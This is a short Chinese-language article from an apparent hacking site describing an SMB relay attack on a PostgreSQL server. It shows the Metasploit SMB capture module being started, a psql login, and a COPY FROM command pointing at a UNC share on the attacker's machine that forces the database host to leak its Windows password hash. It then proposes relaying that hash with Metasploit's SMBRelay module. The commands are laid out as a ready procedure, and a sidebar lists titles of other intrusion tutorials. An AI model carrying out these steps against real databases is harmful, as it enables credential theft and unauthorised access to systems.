PostgreSQL Database SMBRelay AttAck

		当前位置：主页>安全文章>文章资料>入侵实例>文章内容

PostgreSQL Database SMBRelay AttAck

来源：http://www.dis9.com 作者：brk 发布时间：2012-02-14

前面说了MYSQL的，现在来说postgres ，只需要是postgres数据库用户就能成功的进行攻击，老样子先构造个SMB SERVER。

看数据库的启动权限是默认的：

恩，不用注入点了，搭建环境费时间,

    
            msf > use auxiliary/server/capture/smb
msf  auxiliary(smb) > exploit 
[*] Auxiliary module execution completed 
  
[*] Server started. 
msf  auxiliary(smb) >

下面来链接PG数据库

    
            root@Dis9Team:~# psql -h 192.1.1.130 -U postgres 
用户 postgres 的口令： 
psql (8.4.9, 服务器 8.3.17) 
警告：psql 版本8.4， 服务器版本8.3. 
一些psql功能可能无法工作. 
输入 "help" 来获取帮助信息. 
  
postgres=#

        

用老方法读本地伪造的共享，我们就能获得HASH

    
            CREATE TABLE sb(sb text); 
  
COPY sb(sb) FROM '\\\\192.1.1.129\\hacked.txt';

看控制台

而METASPLOIT的模块成功获得了HASH

下面我们直接来获得权限用MSF的SMBRelay模块在读一次。

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·另类网站入侵之一句话木马图片的
·0day批量拿站webshell，挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC

推荐广告